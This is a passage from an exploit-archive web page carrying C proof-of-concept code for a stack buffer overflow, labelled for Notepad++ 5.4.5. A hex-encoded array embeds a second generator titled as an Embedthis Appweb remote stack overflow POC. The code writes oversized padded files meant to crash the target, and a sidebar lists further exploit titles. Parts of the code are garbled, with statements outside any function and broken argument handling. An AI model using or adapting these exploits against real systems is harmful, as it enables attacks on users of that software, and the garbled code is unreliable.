    0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F,
    0x61, 0x64, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66,
    0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,
    0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D,
    0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66,
    0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,
    0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70,
    0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73,
    0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
    0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
    0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,
    0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,
    0x68, 0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,
    0x5F, 0x61, 0x64, 0x29, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F,
    0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,
    0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,
    0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,
    0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,
    0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,
    0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
    0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
    0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
    0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,
    0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66,
    0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,
    0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,
    0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E,
    0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x69, 0x74, 0x5B, 0x5D, 0x20, 0x3D, 0x7B, 0x20, 0x30,
    0x78, 0x33, 0x43, 0x2C, 0x30, 0x78, 0x36, 0x39, 0x2C, 0x30, 0x78, 0x36, 0x44, 0x2C, 0x30, 0x78,
    0x36, 0x37, 0x2C, 0x30, 0x78, 0x32, 0x30, 0x2C, 0x30, 0x78, 0x37, 0x33, 0x2C, 0x30, 0x78, 0x37,
    0x32, 0x2C, 0x30, 0x78, 0x36, 0x33, 0x2C, 0x30, 0x78, 0x33, 0x44, 0x20, 0x7D, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
    0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x73,
    0x68, 0x69, 0x74, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,
    0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65,
    0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,
    0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74,
    0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
    0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D,
    0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C,
    0x20, 0x30, 0x78, 0x34, 0x31, 0x2C, 0x20, 0x34, 0x36, 0x31, 0x36, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x34,
    0x36, 0x31, 0x36, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73,
    0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
    0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,
    0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,
    0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
    0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,
    0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,
    0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,
    0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,
    0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,
    0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,
    0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79,
    0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,
    0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
    0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
    0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
    0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22,
    0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,
    0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,
    0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,
    0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,
    0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C,
    0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29,
    0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
    0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C,
    0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,
    0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
    0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x32,
    0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65,
    0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x6F, 0x66, 0x66, 0x73,
    0x65, 0x74, 0x20, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x22, 0x5C, 0x78, 0x30, 0x30,
    0x22, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x46, 0x69, 0x6C, 0x65,
    0x20, 0x44, 0x6F, 0x6E, 0x65, 0x21, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x7D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x69,
    0x6E, 0x28, 0x69, 0x6E, 0x74, 0x20, 0x61, 0x72, 0x67, 0x63, 0x2C, 0x20, 0x63, 0x68, 0x61, 0x72,
    0x20, 0x2A, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x5D, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B,
    0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x20, 0x3D, 0x20,
    0x61, 0x72, 0x67, 0x76, 0x5B, 0x31, 0x5D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x28, 0x22, 0x43, 0x4C, 0x53, 0x22, 0x29, 0x3B, 0x20,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66,
    0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74,
    0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x45, 0x6D, 0x62, 0x65, 0x64, 0x74, 0x68, 0x69,
    0x73, 0x20, 0x41, 0x70, 0x70, 0x77, 0x65, 0x62, 0x20, 0x52, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x20,
    0x53, 0x74, 0x61, 0x63, 0x6B, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x6C, 0x6F, 0x77, 0x20, 0x50,
    0x4F, 0x43, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20,
    0x2C, 0x20, 0x22, 0x41, 0x6C, 0x6C, 0x20, 0x43, 0x72, 0x65, 0x64, 0x69, 0x74, 0x73, 0x3A, 0x66,
    0x6C, 0x30, 0x20, 0x66, 0x6C, 0x30, 0x77, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64,
    0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x69, 0x66, 0x28, 0x61, 0x72, 0x67, 0x63, 0x20, 0x3C, 0x20, 0x32, 0x29, 0x20, 0x7B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28,
    0x22, 0x55, 0x73, 0x61, 0x67, 0x65, 0x20, 0x69, 0x73, 0x20, 0x25, 0x73, 0x20, 0x66, 0x69, 0x6C,
    0x65, 0x6E, 0x61, 0x6D, 0x65, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x5C, 0x6E, 0x22, 0x2C, 0x20, 0x61,
    0x72, 0x67, 0x76, 0x5B, 0x30, 0x5D, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x66,
    0x6E, 0x61, 0x6D, 0x65, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x72,
    0x65, 0x74, 0x75, 0x72, 0x6E, 0x20, 0x30, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x7D, 0x20, 0x20, 0x0D, 0x0A,
    } ;
     size_t get_executable_path (char* buffer, size_t len)
    {
    char* path_end;
    if (readlink ("/proc/self/exe", buffer, len) <= 0)
    return -1;
    path_end = strrchr (buffer, '/');
    if (path_end == NULL)
    return -1;
    ++path_end;
    *path_end = '\0';
    return (size_t) (path_end - buffer);
    }
    #define STRING_SIZE 0xF4240
    #define S           0x64
    char b[STRING_SIZE];
    memset(b, 0x41, STRING_SIZE);
    FILE *f;
    f = fopen(fname, "wb");
    int i;
    for(i = 0; i < S; i++) {
    fwrite(b, sizeof(char), STRING_SIZE, f); }
    fwrite(V, sizeof(char), strlen(V), f);
    checksum(b, STRING_SIZE);
    char c[100];
    get_executable_path (c, 100);
    printf("FILE DONE !\n");
    printf("path/location of the crafted file is: %s\n", c);
    fclose(f);
    } 
   
    void args(int argc, char *argv[])
    {
    int file;
    int a;
    if(a)
    while((a = getopt(argc, argv, "f")) != EOF) {
    switch(a)                                     {
    case 'f':
    file = (int)optarg;
    break;
    default:
    exit(-1);
                                                   }
                                   }
                                                   }
                                                  
                                                     
   void Usage(char *argv[])
   { printf("*************************************************\n");
     printf("Notepad++ 5.4.5 Stack Buffer Overflow\n");
     printf("Usage is:%s [option1] filename\n", argv[0]);
     printf("CREDITS:fl0 fl0w\n");
     printf("This POC is PRIVATE\n");
     printf("*************************************************\n");
   }
       
   void Menu(char *argv[])
   { fprintf(stderr,
    "\n"
    "\t-f       FILE.c/cpp\n"
    "\n"
    ,
    argv[0]);
    exit(-1);
   }       
                                 
    int main(int argc, char *argv[])
    { CLS(15);
    if(argc < 2) {
    Usage(argv);            
    printf("Example:\n");
    Menu(argv[0]);          
    Usage(argv);       
                 }
    args(argc, argv);                
    Buildfile(argv[2]);
    return 0;  
    }
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Saphplesson 4.3 Remote Blind S
·Quiksoft EasyMail 6.0.3.0 imap
·Joomla Component com_jlord_rss
·Quiksoft EasyMail 6 (AddAttach
·BigAnt Server 2.50 SP1 (ZIP Fi
·Ease Audio Cutter 1.20 (.wav f
·Joomla Component com_jreservat
·Soritong MP3 Player version 1.
·Apple Safari 4.0.3 null pointe
·Installshield 2009 Premier ver
·DJ Studio Pro 4.2 (.PLS file)
·Joomla Album component version
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved